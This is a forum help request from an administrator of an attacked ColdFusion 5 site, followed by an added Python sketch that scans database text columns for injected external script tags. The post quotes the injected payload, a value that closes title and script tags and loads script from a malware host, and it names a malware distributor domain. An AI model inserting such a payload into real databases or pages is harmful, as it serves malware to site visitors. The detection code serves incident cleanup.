We have a ColdFusion site that has been attacked. It is on a Windows 2000 server running ColdFusion 5, and I need to know how to find and get rid of the malicious code. I have changed the cfquery tag to include cfqueryparam, but that has not helped. Currently users are periodically getting this error:
Danger: Malware Ahead!
Google Chrome has blocked access to this page on www.ourweburl.net
Content from hgbyju.com, a known malware distributor, has been inserted into this web page. Visiting this page now is very likely to infect your computer with malware.
I cannot locate any tools that will run on the server, and Malwarebytes did not find anything. Any assistance would be greatly appreciated.
I just found where the malicious code was placed in our table and removed it, but how do I prevent it from returning? Here is what had been entered into one of the columns on multiple records:
></script> </title><script src=http://nmmkmm.com/r.php
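
An added example, not part of the original post: a Python sketch that walks every text column of a database and reports values containing a `<script src=...>` tag whose host is not on an allowlist, which is the shape of the injected value above. The in-memory SQLite database, the `products` table and its columns are constructed stand-ins for the site's real database, and the function names are hypothetical.

```python
import re
import sqlite3

# Matches <script ... src=...> with a quoted or unquoted URL and captures the host.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*[\"']?\s*(?:https?:)?//([^/\s\"'>]+)",
    re.IGNORECASE,
)

def external_script_hosts(value, allowed_hosts=()):
    """Return hosts of script tags in value that are not in allowed_hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    hosts = (h.lower() for h in SCRIPT_SRC.findall(value or ""))
    return [h for h in hosts if h not in allowed]

def scan_database(conn, allowed_hosts=()):
    """Check every string value in every table; return (table, column, rowid, hosts)."""
    findings = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        cols = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')]
        for col in cols:
            query = f'SELECT rowid, "{col}" FROM "{table}"'
            for rowid, value in conn.execute(query):
                if isinstance(value, str):
                    hosts = external_script_hosts(value, allowed_hosts)
                    if hosts:
                        findings.append((table, col, rowid, hosts))
    return findings

def build_sample_db():
    """Constructed sample data: one clean row, one with the injected value, one legitimate script."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO products (title, body) VALUES (?, ?)", [
        ("Widget", "Plain description"),
        ("Gadget></script> </title><script src=http://nmmkmm.com/r.php", "ok"),
        ("Map", '<script src="https://www.ourweburl.net/js/map.js"></script>'),
    ])
    return conn

if __name__ == "__main__":
    for finding in scan_database(build_sample_db(), allowed_hosts=["www.ourweburl.net"]):
        print(finding)
```

Running the scan on a schedule shows whether the injection has returned and which tables and columns it reaches, which narrows down the query that is still writing unparameterized input.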